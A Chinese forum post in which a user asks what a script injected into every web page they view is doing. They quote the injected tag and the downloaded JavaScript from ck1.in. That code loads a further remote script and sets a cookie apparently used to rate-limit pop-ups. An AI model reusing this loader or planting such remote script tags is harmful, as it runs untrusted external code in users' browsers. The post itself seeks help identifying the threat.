我发现在浏览网页时(IE),查看其源文件,都会有这么一条语句,
<script src=http://ck1.in/n.js></script> 

我用迅雷把它下载了,文件内容如下,请大家解释一下这段代码到底在干什么,有什么危害。
document.writeln("<script src=\"http:\/\/ck1.in\/S368\/NewJs2.js\"><\/script>");
document.writeln("<script>");
document.writeln("function Start(){");
document.writeln("var Then = new Date() ");
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = \"Cookie1=\" ");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
document.writeln("if (beginPosition != -1){ ");
document.writeln("} else ");
document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");
document.writeln("");
document.writeln("}");
document.writeln("}");
document.writeln("Start();");
document.writeln("<\/script>")